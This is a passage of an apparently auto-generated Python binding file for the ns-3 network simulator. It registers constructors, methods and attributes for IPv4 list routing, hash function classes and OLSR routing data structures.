ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::Socket::SocketErrno,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ecb) [member function] cls.add_method('RouteInput', 'bool', [param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): ns3::Ptr<ns3::Ipv4Route> ns3::Ipv4ListRouting::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function] cls.add_method('RouteOutput', 'ns3::Ptr< ns3::Ipv4Route >', [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function] cls.add_method('SetIpv4', 'void', [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::DoInitialize() [member function] cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3HashImplementation_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation(ns3::Hash::Implementation const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Implementation const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation() [constructor] cls.add_constructor([]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Implementation::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_pure_virtual=True, is_virtual=True) ## hash-function.h (module 'core'): uint64_t ns3::Hash::Implementation::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Implementation::clear() [member function] cls.add_method('clear', 'void', [], is_pure_virtual=True, is_virtual=True) return def register_Ns3HashFunctionFnv1a_methods(root_module, cls): ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a(ns3::Hash::Function::Fnv1a const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Fnv1a const &', 'arg0')]) ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a() [constructor] cls.add_constructor([]) ## hash-fnv.h (module 'core'): uint32_t ns3::Hash::Function::Fnv1a::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-fnv.h (module 'core'): uint64_t ns3::Hash::Function::Fnv1a::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-fnv.h (module 'core'): void ns3::Hash::Function::Fnv1a::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionHash32_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Function::Hash32 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Hash32 const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Hash32Function_ptr hp) [constructor] cls.add_constructor([param('ns3::Hash::Hash32Function_ptr', 'hp')]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash32::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Function::Hash32::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionHash64_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Function::Hash64 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Hash64 const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Hash64Function_ptr hp) [constructor] cls.add_constructor([param('ns3::Hash::Hash64Function_ptr', 'hp')]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash64::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): uint64_t ns3::Hash::Function::Hash64::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Function::Hash64::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionMurmur3_methods(root_module, cls): ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3(ns3::Hash::Function::Murmur3 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Murmur3 const &', 'arg0')]) ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3() [constructor] cls.add_constructor([]) ## hash-murmur3.h (module 'core'): uint32_t ns3::Hash::Function::Murmur3::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-murmur3.h (module 'core'): uint64_t ns3::Hash::Function::Murmur3::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-murmur3.h (module 'core'): void ns3::Hash::Function::Murmur3::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3OlsrAssociation_methods(root_module, cls): cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::Association::Association() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::Association::Association(ns3::olsr::Association const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::Association const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::Association::netmask [variable] cls.add_instance_attribute('netmask', 'ns3::Ipv4Mask', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::Association::networkAddr [variable] cls.add_instance_attribute('networkAddr', 'ns3::Ipv4Address', is_const=False) return def register_Ns3OlsrAssociationTuple_methods(root_module, cls): cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::AssociationTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::AssociationTuple(ns3::olsr::AssociationTuple const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::AssociationTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::expirationTime [variable] cls.add_instance_attribute('expirationTime', 'ns3::Time', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::gatewayAddr [variable] cls.add_instance_attribute('gatewayAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::netmask [variable] cls.add_instance_attribute('netmask', 'ns3::Ipv4Mask', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::networkAddr [variable] cls.add_instance_attribute('networkAddr', 'ns3::Ipv4Address', is_const=False) return def register_Ns3OlsrDuplicateTuple_methods(root_module, cls): cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::DuplicateTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::DuplicateTuple(ns3::olsr::DuplicateTuple const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::DuplicateTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::address [variable] cls.add_instance_attribute('address', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::expirationTime [variable] cls.add_instance_attribute('expirationTime', 'ns3::Time', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::ifaceList [variable] cls.add_instance_attribute('ifaceList', 'std::vector< ns3::Ipv4Address >', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::retransmitted [variable] cls.add_instance_attribute('retransmitted', 'bool', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::sequenceNumber [variable] cls.add_instance_attribute('sequenceNumber', 'uint16_t', is_const=False) return def register_Ns3OlsrIfaceAssocTuple_methods(root_module, cls): cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple::IfaceAssocTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple::IfaceAssocTuple(ns3::olsr::IfaceAssocTuple const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::IfaceAssocTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple::ifaceAddr [variable] cls.add_instance_attribute('ifaceAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple::mainAddr [variable] cls.add_instance_attribute('mainAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple::time [variable] cls.add_instance_attribute('time', 'ns3::Time', is_const=False) return def register_Ns3OlsrLinkTuple_methods(root_module, cls): cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::LinkTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::LinkTuple(ns3::olsr::LinkTuple const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::LinkTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::asymTime [variable] cls.add_instance_attribute('asymTime', 'ns3::Time', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::localIfaceAddr [variable] cls.add_instance_attribute('localIfaceAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::neighborIfaceAddr [variable] cls.add_instance_attribute('neighborIfaceAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::symTime [variable] cls.add_instance_attribute('symTime', 'ns3::Time', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::time [variable] cls.add_instance_attribute('time', 'ns3::Time', is_const=False) return def register_Ns3OlsrMessageHeader_methods(root_module, cls): cls.add_output_stream_operator() ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::MessageHeader(ns3::olsr::MessageHeader const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::MessageHeader const &', 'arg0')]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::MessageHeader() [constructor] cls.add_constructor([]) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Deserialize(ns3::Buffer::Iterator start) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_virtual=True) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello & ns3::olsr::MessageHeader::GetHello() [member function] cls.add_method('GetHello', 'ns3::olsr::MessageHeader::Hello &', []) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello const & ns3::olsr::MessageHeader::GetHello() const [member function] cls.add_method('GetHello', 'ns3::olsr::MessageHeader::Hello const &', [], is_const=True) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna & ns3::olsr::MessageHeader::GetHna() [member function] cls.add_method('GetHna', 'ns3::olsr::MessageHeader::Hna &', []) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna const & ns3::olsr::MessageHeader::GetHna() const [member function] cls.add_method('GetHna', 'ns3::olsr::MessageHeader::Hna const &', [], is_const=True) ## olsr-header.h (module 'olsr'): uint8_t ns3::olsr::MessageHeader::GetHopCount() const [member function] cls.add_method('GetHopCount', 'uint8_t', [], is_const=True) ## olsr-header.h (module 'olsr'): ns3::TypeId ns3::olsr::MessageHeader::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): uint16_t ns3::olsr::MessageHeader::GetMessageSequenceNumber() const [member function] cls.add_method('GetMessageSequenceNumber', 'uint16_t', [], is_const=True) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::MessageType ns3::olsr::MessageHeader::GetMessageType() const [member function] cls.add_method('GetMessageType', 'ns3::olsr::MessageHeader::MessageType', [], is_const=True) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid & ns3::olsr::MessageHeader::GetMid() [member function] cls.add_method('GetMid', 'ns3::olsr::MessageHeader::Mid &', []) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid const & ns3::olsr::MessageHeader::GetMid() const [member function] cls.add_method('GetMid', 'ns3::olsr::MessageHeader::Mid const &', [], is_const=True) ## olsr-header.h (module 'olsr'): ns3::Ipv4Address ns3::olsr::MessageHeader::GetOriginatorAddress() const [member function] cls.add_method('GetOriginatorAddress', 'ns3::Ipv4Address', [], is_const=True) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc & ns3::olsr::MessageHeader::GetTc() [member function] cls.add_method('GetTc', 'ns3::olsr::MessageHeader::Tc &', []) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc const & ns3::olsr::MessageHeader::GetTc() const [member function] cls.add_method('GetTc', 'ns3::olsr::MessageHeader::Tc const &', [], is_const=True) ## olsr-header.h (module 'olsr'): uint8_t ns3::olsr::MessageHeader::GetTimeToLive() const [member function] cls.add_method('GetTimeToLive', 'uint8_t', [], is_const=True) ## olsr-header.h (module 'olsr'): static ns3::TypeId ns3::olsr::MessageHeader::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## olsr-header.h (module 'olsr'): ns3::Time ns3::olsr::MessageHeader::GetVTime() const [member function] cls.add_method('GetVTime', 'ns3::Time', [], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Serialize(ns3::Buffer::Iterator start) const [member function] cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetHopCount(uint8_t hopCount) [member function] cls.add_method('SetHopCount', 'void', [param('uint8_t', 'hopCount')]) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetMessageSequenceNumber(uint16_t messageSequenceNumber) [member function] cls.add_method('SetMessageSequenceNumber', 'void', [param('uint16_t', 'messageSequenceNumber')]) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetMessageType(ns3::olsr::MessageHeader::MessageType messageType) [member function] cls.add_method('SetMessageType', 'void', [param('ns3::olsr::MessageHeader::MessageType', 'messageType')]) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetOriginatorAddress(ns3::Ipv4Address originatorAddress) [member function] cls.add_method('SetOriginatorAddress', 'void', [param('ns3::Ipv4Address', 'originatorAddress')]) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetTimeToLive(uint8_t timeToLive) [member function] cls.add_method('SetTimeToLive', 'void', [param('uint8_t', 'timeToLive')]) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetVTime(ns3::Time time) [member function] cls.add_method('SetVTime', 'void', [param('ns3::Time', 'time')]) return def register_Ns3OlsrMessageHeaderHello_methods(root_module, cls): ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::Hello() [constructor] cls.add_constructor([]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::Hello(ns3::olsr::MessageHeader::Hello const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::MessageHeader::Hello const &', 'arg0')]) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Hello::Deserialize(ns3::Buffer::Iterator start, uint32_t messageSize) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start'), param('uint32_t', 'messageSize')]) ## olsr-header.h (module 'olsr'): ns3::Time ns3::olsr::MessageHeader::Hello::GetHTime() const [member function] cls.add_method('GetHTime', 'ns3::Time', [], is_const=True) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Hello::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Hello::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Hello::Serialize(ns3::Buffer::Iterator start) const [member function] cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Hello::SetHTime(ns3::Time time) [member function] cls.add_method('SetHTime', 'void', [param('ns3::Time', 'time')]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::hTime [variable] cls.add_instance_attribute('hTime', 'uint8_t', is_const=False) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::linkMessages [variable] cls.add_instance_attribute('linkMessages', 'std::vector< ns3::olsr::MessageHeader::Hello::LinkMessage >', is_const=False) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::willingness [variable] cls.add_instance_attribute('willingness', 'uint8_t', is_const=False) return def register_Ns3OlsrMessageHeaderHelloLinkMessage_methods(root_module, cls): ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::LinkMessage::LinkMessage() [constructor] cls.add_constructor([]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::LinkMessage::LinkMessage(ns3::olsr::MessageHeader::Hello::LinkMessage const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::MessageHeader::Hello::LinkMessage const &', 'arg0')]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::LinkMessage::linkCode [variable] cls.add_instance_attribute('linkCode', 'uint8_t', is_const=False) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::LinkMessage::neighborInterfaceAddresses [variable] cls.add_instance_attribute('neighborInterfaceAddresses', 'std::vector< ns3::Ipv4Address >', is_const=False) return def register_Ns3OlsrMessageHeaderHna_methods(root_module, cls): ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Hna() [constructor] cls.add_constructor([]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Hna(ns3::olsr::MessageHeader::Hna const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::MessageHeader::Hna const &', 'arg0')]) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Hna::Deserialize(ns3::Buffer::Iterator start, uint32_t messageSize) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start'), param('uint32_t', 'messageSize')]) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Hna::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Hna::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Hna::Serialize(ns3::Buffer::Iterator start) const [member function] cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::associations [variable] cls.add_instance_attribute('associations', 'std::vector< ns3::olsr::MessageHeader::Hna::Association >', is_const=False) return def register_Ns3OlsrMessageHeaderHnaAssociation_methods(root_module, cls): ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Association::Association() [constructor] cls.add_constructor([]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Association::Association(ns3::olsr::MessageHeader::Hna::Association const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::MessageHeader::Hna::Association const &', 'arg0')]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Association::address [variable] cls.add_instance_attribute('address', 'ns3::Ipv4Address', is_const=False) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Association::mask [variable] cls.add_instance_attribute('mask', 'ns3::Ipv4Mask', is_const=False) return def register_Ns3OlsrMessageHeaderMid_methods(root_module, cls): ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid::Mid() [constructor] cls.add_constructor([]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid::Mid(ns3::olsr::MessageHeader::Mid const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::MessageHeader::Mid const &', 'arg0')]) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Mid::Deserialize(ns3::Buffer::Iterator start, uint32_t messageSize) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start'), param('uint32_t', 'messageSize')]) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Mid::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Mid::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Mid::Serialize(ns3::Buffer::Iterator start) const [member function] cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid::interfaceAddresses [variable] cls.add_instance_attribute('interfaceAddresses', 'std::vector< ns3::Ipv4Address >', is_const=False) return def register_Ns3OlsrMessageHeaderTc_methods(root_module, cls): ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc::Tc() [constructor] cls.add_constructor([]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc::Tc(ns3::olsr::MessageHeader::Tc const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::MessageHeader::Tc const &', 'arg0')]) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Tc::Deserialize(ns3::Buffer::Iterator start, uint32_t messageSize) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start'), param('uint32_t', 'messageSize')]) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Tc::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Tc::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Tc::Serialize(ns3::Buffer::Iterator start) const [member function] cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc::ansn [variable] cls.add_instance_attribute('ansn', 'uint16_t', is_const=False) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc::neighborAddresses [variable] cls.add_instance_attribute('neighborAddresses', 'std::vector< ns3::Ipv4Address >', is_const=False) return def register_Ns3OlsrMprSelectorTuple_methods(root_module, cls): cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::MprSelectorTuple::MprSelectorTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::MprSelectorTuple::MprSelectorTuple(ns3::olsr::MprSelectorTuple const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::MprSelectorTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::MprSelectorTuple::expirationTime [variable] cls.add_instance_attribute('expirationTime', 'ns3::Time', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::MprSelectorTuple::mainAddr [variable] cls.add_instance_attribute('mainAddr', 'ns3::Ipv4Address', is_const=False) return def register_Ns3OlsrNeighborTuple_methods(root_module, cls): cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::NeighborTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::NeighborTuple(ns3::olsr::NeighborTuple const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::NeighborTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::neighborMainAddr [variable] cls.add_instance_attribute('neighborMainAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::status [variable] cls.add_instance_attribute('status', 'ns3::olsr::NeighborTuple::Status', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::willingness [variable] cls.add_instance_attribute('willingness', 'uint8_t', is_const=False) return def register_Ns3OlsrOlsrState_methods(root_module, cls): ## olsr-state.h (module 'olsr'): ns3::olsr::OlsrState::OlsrState(ns3::olsr::OlsrState const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::OlsrState const &', 'arg0')]) ## olsr-state.h (module 'olsr'): ns3::olsr::OlsrState::OlsrState() [constructor] cls.add_constructor([]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseAssociation(ns3::olsr::Association const & tuple) [member function] cls.add_method('EraseAssociation', 'void', [param('ns3::olsr::Association const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseAssociationTuple(ns3::olsr::AssociationTuple const & tuple) [member function] cls.add_method('EraseAssociationTuple', 'void', [param('ns3::olsr::AssociationTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseDuplicateTuple(ns3::olsr::DuplicateTuple const & tuple) [member function] cls.add_method('EraseDuplicateTuple', 'void', [param('ns3::olsr::DuplicateTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseIfaceAssocTuple(ns3::olsr::IfaceAssocTuple const & tuple) [member function] cls.add_method('EraseIfaceAssocTuple', 'void', [param('ns3::olsr::IfaceAssocTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseLinkTuple(ns3::olsr::LinkTuple const & tuple) [member function] cls.add_method('EraseLinkTuple', 'void', [param('ns3::olsr::LinkTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void 